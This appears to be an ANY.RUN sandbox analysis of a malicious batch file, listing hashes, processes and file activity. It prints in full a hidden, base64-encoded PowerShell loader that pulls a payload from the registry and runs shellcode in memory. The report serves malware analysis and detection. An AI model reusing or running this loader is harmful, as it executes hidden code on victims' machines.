File name: | a.bat |
Full analysis: | https://app.any.run/tasks/a7485b3e-fe43-4bf1-8746-877bab19e6d3 |
Verdict: | Malicious activity |
Analysis date: | September 19, 2019, 09:05:25 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | D9B3DF04FAFB741F1B9ECC666323E8A0 |
SHA1: | 9CEEBD05284DEFD680825742C540FF588658ADAA |
SHA256: | B257C3FAFF236B845A18AA3328D1A1DB0D84F78ED1C67CD1CC35850FB1FCB0AD |
SSDEEP: | 192:KhvBihvymfavEoL9IBhFKvDUufvzFVSyZ4ehq0BcqeYdAuRYgMRImDhUhsv/W39:KhvBAhfMEM9ohduXKfehq0BcgdAuRYg5 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3424 | cmd /c ""C:\Users\admin\AppData\Local\Temp\a.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 4294770688 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2224 | PowerShell.exe -NonInteractive -WindowStyle Hidden -EncodedCommand JAB3AEUAaAB0AEkAUAAgAD0AIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFMAaABlAGwAbAAiADsAJABuAHQAOQBkAFkAIAA9ACAAIgB7ADEAMwBCADkANQBDADYANwAtADIARAA3ADYALQA1ADgANQBBAC0AQQA1ADEAMABGAEQAOQBEAEMARQA1ADMAMgBGADMAMAB9ACIAOwBmAHUAbgBjAHQAaQBvAG4AIAB5AHAATAAwAHcAewBQAGEAcgBhAG0AKABbAE8AdQB0AHAAdQB0AFQAeQBwAGUAKABbAFQAeQBwAGUAXQApAF0AWwBQAGEAcgBhAG0AZQB0AGUAcgAoACAAUABvAHMAaQB0AGkAbwBuACAAPQAgADAAKQBdAFsAVAB5AHAAZQBbAF0AXQAkAEIAVABYAEEASQBiAG0ARQBUACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAeQBwAGUAWwBdACgAMAApACkALABbAFAAYQByAGEAbQBlAHQAZQByACgAIABQAG8AcwBpAHQAaQBvAG4AIAA9ACAAMQAgACkAXQBbAFQAeQBwAGUAXQAkAHIAdgBRAHMASgBJADgAcABjADQAIAA9ACAAWwBWAG8AaQBkAF0AKQAkAEIAVgB5AGgAYwB6AE0AMwBIACAAPQAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgA7ACQASwBkAEYAZQBvAEgAWAA4ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAoACcAUgBlAGYAbABlAGMAdABlAGQARABlAGwAZQBnAGEAdABlACcAKQA7ACQAQgBqAHYASAA4ACAAPQAgACQAQgBWAHkAaABjAHoATQAzAEgALgBEAGUAZgBpAG4AZQBEAHkAbgBhAG0AaQBjAEEAcwBzAGUAbQBiAGwAeQAoACQASwBkAEYAZQBvAEgAWAA4ACwAIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEUAbQBpAHQALgBBAHMAcwBlAG0AYgBsAHkAQgB1AGkAbABkAGUAcgBBAGMAYwBlAHMAcwBdADoAOgBSAHUAbgApADsAJABHAEEASwBDADUAMgBIADIAIAA9ACAAJABCAGoAdgBIADgALgBEAGUAZgBpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACgAJwBJAG4ATQBlAG0AbwByAHkATQBvAGQAdQBsAGUAJwAsACAAJABmAGEAbABzAGUAKQA7ACQATwB0AHoAQgBqAEQAYQAgAD0AIAAkAEcAQQBLAEMANQAyAEgAMgAuAEQAZQBmAGkAbgBlAFQAeQBwAGUAKAAnAE0AeQBEAGUAbABlAGcAYQB0AGUAVAB5AHAAZQAnACwAIAAnAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBhAGwAZQBkACwAIABBAG4AcwBpAEMAbABhAHMAcwAsACAAQQB1AHQAbwBDAGwAYQBzAHMAJwAsACAAWwBTAHkAcwB0AGUAbQAuAE0AdQBsAHQAaQBjAGEAcwB0AEQAZQBsAGUAZwBhAHQAZQBdACkAOwAkAE8ASgBYADAANQAgAD0AIAAkAE8AdAB6AEIAagBEAGEALgBEAGUAZgBpAG4AZQBDAG8AbgBzAHQAcgB1AGMAdABvAHIAKAAnAFIAVABTAHAAZQBjAGkAYQBsAE4AYQBtAGUALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABQAHUAYgBsAGkAYwAnACwAIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEMAYQBsAGwAaQBuAGcAQwBvAG4AdgBlAG4AdABpAG8AbgBzAF0AOgA6AFMAdABhAG4AZABhAHIAZAAsACAAJABCAFQAWABBAEkAYgBtAEUAVAApADsAJABPAEoAWAAwADUALgBTAGUAdABJAG0AcABsAGUAbQBlAG4AdABhAHQAaQBvAG4ARgBsAGEAZwBzACgAJwBSAHUAbgB0AGkAbQBlACwAIABNAGEAbgBhAGcAZQBkACcAKQA7ACQARgBEAG8AbwBiACAAPQAgACQATwB0AHoAQgBqAEQAYQAuAEQAZQBmAGkAbgBlAE0AZQB0AGgAbwBkACgAJwBJAG4AdgBvAGsAZQAnACwAIAAnAFAAdQBiAGwAaQBjACwAIABIAGkAZABlAEIAeQBTAGkAZwAsACAATgBlAHcAUwBsAG8AdAAsACAAVgBpAHIAdAB1AGEAbAAnACwAIAAkAHIAdgBRAHMASgBJADgAcABjADQALAAgACQAQgBUAFgAQQBJAGIAbQBFAFQAKQA7ACQARgBEAG8AbwBiAC4AUwBlAHQASQBtAHAAbABlAG0AZQBuAHQAYQB0AGkAbwBuAEYAbABhAGcAcwAoACcAUgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAAnACkAOwBXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACQATwB0AHoAQgBqAEQAYQAuAEMAcgBlAGEAdABlAFQAeQBwAGUAKAApADsAfQBmAHUAbgBjAHQAaQBvAG4AIABkAEkAdQB3AHkASABpAHYAKAAkAHcAeABUAGIAbABtAHkANAAsACAAJABVAEIAbABlAGYAZwAxAE8AaQApACAAewAkAGMAZQBmADUAYwB2ADcAYwAgACAAPQAgACQAdwB4AFQAYgBsAG0AeQA0AFsAJABVAEIAbABlAGYAZwAxAE8AaQArADAAXQAgACoAIAAxADYANwA3ADcAMgAxADYAOwAkAGMAZQBmADUAYwB2ADcAYwAgACsAPQAgACQAdwB4AFQAYgBsAG0AeQA0AFsAJABVAEIAbABlAGYAZwAxAE8AaQArADEAXQAgACoAIAA2ADUANQAzADYAOwAkAGMAZQBmADUAYwB2ADcAYwAgACsAPQAgACQAdwB4AFQAYgBsAG0AeQA0AFsAJABVAEIAbABlAGYAZwAxAE8AaQArADIAXQAgACoAIAAyADUANgA7ACQAYwBlAGYANQBjAHYANwBjACAAKwA9ACAAJAB3AHgAVABiAGwAbQB5ADQAWwAkAFUAQgBsAGUAZgBnADEATwBpACsAMwBdACAAKgAgADEAOwByAGUAdAB1AHIAbgAgACQAYwBlAGYANQBjAHYANwBjADsAfQAkAGMASABpAGIAbAB3AEYAWgBUACAAPQAgAEAAIgAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABXAHIAaQB0AGUAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAoAEkAbgB0AFAAdAByACAAcAByAG8AYwBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABhAGQAZAByAGUAcwBzACwAIABiAHkAdABlAFsAXQAgAGIAdQBmAGYAZQByACwAIAB1AGkAbgB0ACAAcwBpAHoAZQAsACAAdQBpAG4AdAAgAHcAcgBpAHQAdABlAG4AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABTAGUAdABFAHIAcgBvAHIATQBvAGQAZQAoAHUAaQBuAHQAIAB1AE0AbwBkAGUAKQA7AAoAIgBAAAoAJABtADIASABVADYAWQAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMASABpAGIAbAB3AEYAWgBUACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AGYAdQBuAGMAdABpAG8AbgAgAE0AYQBjAGIARQBCAFgAaQAxACgAJABjAEgAaQBiAGwAdwBGAFoAVAAsACAAJAB0AHQAWgBHAHoALAAgACQAQQBWAEoANgBSAHQAagApACAAewAkAHoAWgB2AHQAUgBaAFkAUQBVAEoAIAA9ACAAJABtADIASABVADYAWQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQA7ACQAQQBXAHgAbgBiAHQANABmAHEAdQAgAD0AIAAkAG0AMgBIAFUANgBZADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAkAGMASABpAGIAbAB3AEYAWgBUAC4ATABlAG4AZwB0AGgALAAwAHgAMAAwADAAMAAzADAAMAAwACwAMAB4ADQAMAApADsAJABCAGwAbABVAEwAdwAgAD0AIAAkAG0AMgBIAFUANgBZADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAkAEEAVgBKADYAUgB0AGoALgBMAGUAbgBnAHQAaAAsADAAeAAwADAAMAAwADMAMAAwADAALAAwAHgANAAwACkAOwAkAG0AMgBIAFUANgBZADoAOgBXAHIAaQB0AGUAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAoACQAegBaAHYAdABSAFoAWQBRAFUASgAsACAAJABBAFcAeABuAGIAdAA0AGYAcQB1ACwAIAAkAGMASABpAGIAbAB3AEYAWgBUACwAIAAkAGMASABpAGIAbAB3AEYAWgBUAC4ATABlAG4AZwB0AGgALAAgADAAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAkAG0AMgBIAFUANgBZADoAOgBXAHIAaQB0AGUAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAoACQAegBaAHYAdABSAFoAWQBRAFUASgAsACAAJABCAGwAbABVAEwAdwAsACAAJABBAFYASgA2AFIAdABqACwAIAAkAEEAVgBKADYAUgB0AGoALgBMAGUAbgBnAHQAaAAsACAAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7ACQASABaAE8AQwA1AFUAUAAgAD0AIABbAEkAbgB0AFAAdAByAF0AKAAkAEEAVwB4AG4AYgB0ADQAZgBxAHUALgBUAG8ASQBuAHQANgA0ACgAKQArACQAdAB0AFoARwB6ACkAOwAkAEMATgBmAG8ARQA5ACAAPQAgAHkAcABMADAAdwAgAEAAKABbAEkAbgB0AFAAdAByAF0ALAAgAFsASQBuAHQAUAB0AHIAXQApACAAKABbAFYAbwBpAGQAXQApADsAJABZAGIAUAB4AFMAeAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBHAGUAdABEAGUAbABlAGcAYQB0AGUARgBvAHIARgB1AG4AYwB0AGkAbwBuAFAAbwBpAG4AdABlAHIAKAAkAEgAWgBPAEMANQBVAFAALAAgACQAQwBOAGYAbwBFADkAKQA7ACQAbQAyAEgAVQA2AFkAOgA6AFMAZQB0AEUAcgByAG8AcgBNAG8AZABlACgAMAB4ADgAMAAwADYAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAkAFkAYgBQAHgAUwB4AC4ASQBuAHYAbwBrAGUAKAAkAEIAbABsAFUATAB3ACwAIAAkAEEAVwB4AG4AYgB0ADQAZgBxAHUAKQA7AH0AZgB1AG4AYwB0AGkAbwBuACAAQwBSAFYAQQBPACgAJABSAGwAbwA3AEYALAAgACQASQBDAGMAUQA5ADIAcABCACkAIAB7ACQAcwBaAGcAdgBSAEUAMABXAHQAIAA9ACAAZABJAHUAdwB5AEgAaQB2ACAAJABSAGwAbwA3AEYAIAAxADsAJABDADgAVwBJAFQAIAA9ACAANQA7AHcAaABpAGwAZQAgACgAJABDADgAVwBJAFQAKwA4ACAALQBsAHQAIAAkAHMAWgBnAHYAUgBFADAAVwB0ACkAIAB7ACQAcABTAGMAawBKAG4ARQBOACAAPQAgACQAUgBsAG8ANwBGAFsAJABDADgAVwBJAFQAXQA7ACQAUQBmAHgAcgBCAHcAIAA9ACAAZABJAHUAdwB5AEgAaQB2ACAAJABSAGwAbwA3AEYAIAAoACQAQwA4AFcASQBUACsAMQApADsAJABlAFUASwB1ADMAMwAgAD0AIABkAEkAdQB3AHkASABpAHYAIAAkAFIAbABvADcARgAgACgAJABDADgAVwBJAFQAKwA1ACkAOwAkAEMAOABXAEkAVAAgACsAPQAgADkAOwBpAGYAIAAoACQAcABTAGMAawBKAG4ARQBOACAALQBlAHEAIAAkAEkAQwBjAFEAOQAyAHAAQgApACAAewBNAGEAYwBiAEUAQgBYAGkAMQAgACQAUgBsAG8ANwBGAFsAJABDADgAVwBJAFQALgAuACgAJABDADgAVwBJAFQAKwAkAFEAZgB4AHIAQgB3ACkAXQAgACQAZQBVAEsAdQAzADMAIAAkAFIAbABvADcARgA7AGIAcgBlAGEAawA7AH0AIABlAGwAcwBlACAAewAkAEMAOABXAEkAVAAgACsAPQAgACQAUQBmAHgAcgBCAHcAOwB9AH0AfQAkAFMAbgBOAEYATgBxACAAPQAgACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIAJAB3AEUAaAB0AEkAUAAiACAALQBOAGEAbQBlACAAIgAkAG4AdAA5AGQAWQAiACkALgAkAG4AdAA5AGQAWQA7ACQAUgBsAG8ANwBGACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFMAbgBOAEYATgBxACkAOwAkAFIAbABvADcARgBbADAAXQAgAD0AIAAwADsAaQBmACAAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQ6AGUAIAAtAGUAcQAgADgAKQAgAHsAQwBSAFYAQQBPACAAJABSAGwAbwA3AEYAIAAyADsAfQAgAGUAbABzAGUAIAB7AEMAUgBWAEEATwAgACQAUgBsAG8ANwBGACAAMQA7AH0A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4294770688 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (2224) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US |
PID | Process | Filename | Type | |
---|---|---|---|---|
2224 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LUYJES1FOT82Q8PRK8W5.temp | — | |
MD5:— | SHA256:— | |||
2224 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2224 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169a60.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 |